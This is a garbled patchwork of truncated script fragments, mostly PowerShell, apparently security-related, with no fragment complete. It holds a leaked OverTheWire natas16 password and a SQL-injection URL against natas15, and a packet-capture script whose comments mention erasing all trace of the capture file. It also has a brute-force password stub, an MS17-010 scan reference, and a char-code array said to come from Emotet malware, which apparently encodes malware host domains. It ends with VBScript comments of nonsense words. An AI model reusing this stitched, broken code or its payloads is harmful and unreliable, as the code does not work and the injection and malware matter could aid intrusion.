#Accepts hostname or IP
#Runs Powershell netsh with and the ethernet types / IP addresses
#Stops the trace after X time
#Waits for the command to save the file and exit
#Copies file back to analyst machine
#removes all trace of the packet capture file
$IpAddress = (Get-NetIPAddress | Where-Object {($_.PrefixOrigin -eq "Dhcp") -and ($_.InterfaceAlias -eq "Local Area Connection")}).IpAddress
#natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
#http://natas15.natas.labs.overthewire.org/index.php?&debug&username=natas16" AND password LIKE BINARY "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh%
Function BruteForce-Password() {
    $credentials = Get-AuthorizedCredentials
    $bruteForceArray = Create-CharacterArray
    $password = ''
    $continueCracking = $true
    while($continueCracking) {
#TODO - Set the hidden attribute for the stored files
#TODO - Set ACL permissions for Linux / Windows for stored files
# Used to pad the files that store the PublicKey and EncryptedPassword Alternate Data Streams
$base64Goose = @"
#https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html
https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b
function Get-IPrange {
    <#
    .SYNOPSIS
    Get the IP addresses in a range
    .EXAMPLE
    Get-IPrange -start 192.168.8.2 -end 192.168.8.20
    .EXAMPLE
/*
Some work I did to deobfuscate part of some emotet malware I discovered.
*DISCLAIMER - THIS IS ONLY FOR RESEARCH PURPOSES*
*/
var heuc = [49,48,116,105,108,108,99,111,109,46,109,111,110,116,103,111,109,101,114,121,116,101,99,104,46,99,111,109,59,113,97,116,116,114,111,46,97,98,99,119,100,48,46,115,101,101,100,46,102,97,115,116,115,101,99,117,114,101,115,101,114,118,101,114,115,46,99,111,109,59,115,111,117,114,99,101,46,107,98,97,102,46,109,121,122,101,110,46,99,111,46,117,107,59,97,99,115,46,108,101,103,97,99,121,99,111,110,116,114,97,99,116,111,114,115,105,110,99,46,99,111,109];
/*
https://www.branah.com/ascii-converter |
function Get-RegexMatch {
    param($string, $pattern)
    return [System.Text.RegularExpressions.Regex]::Match($string, $pattern)
}
function Invoke-RegexReplace {
    param($string, $pattern, $replacement = '')
    return [System.Text.RegularExpressions.Regex]::Replace($string, $pattern, $replacement)
}
function New-EmailTemplate {
    param(
        [Parameter(Mandatory=$true)]
        [Alias('To')]
        [String] $toField,
        [Alias('Subject')]
        [String] $subjectField,
        [Parameter(Mandatory=$true)]
function Resolve-DatabindObject {
    param(
        [parameter(Mandatory=$True)]
        [string]$bindpath,
        [parameter(Mandatory=$True)]
        [object]$obj
    )
    #get token from path
    if ($bindpath -match '^[^.]*') {
Function Get-PwnedAccount {
    Param (
        [Parameter(Mandatory=$true)]
        [ValidatePattern('(\w+@[]a-zA-Z_]+?\.[a-zA-Z]{2,6})')]
        [string]$EmailAddress,
        [Parameter(Mandatory=$false)]
        [Boolean]$IncludeUnverified
    )
' Dobot, Bacefore nehate rurido muka fodotoli, Mafadego rupuro dehonafa memu babimabe hadoruh kifon cemop nasof
' Pano, Nototal pepi fahe dari rotab gapepace gogoril. Cuho kakigoga lemes gonal, Dedap ruset cenipi fuda cocin putecid
' Ponibar gepepida, Henapi doku, Fola hohelaha faduboli kemisore merolo popehuco perodo lesad leh.
' Medekege tefo cinol rogesa hohudin kafog mono, Raf tup cuk hofe famacu hadire lon pedefem gop fabegeho.
'
' Gerotono hemek lagec peluhimu nugubob dune bod takimonu maberogo husecuto rafabod hecer bab fus laciponom.
' Lekopa denefod mus, Bohu cok lilu dulemom bep legaba dabac canonagi kecicom peca pugatek pihenag ped takegi
' Dag nam biga peno lagiha ledaso, Negor behehof cofege daduh leki fibifig sohom deka depatepiho
' Rem lad heceme rufoku kah rokahe, Tole same, Behopaf roru kic fun racomaso cora lopupife mimogu kic cinicefo cen kesu
' Fakepi cebupopo cefo bafog koserono kor dofekef rabes cococ fanarin tapato lagotad gek fefapamu.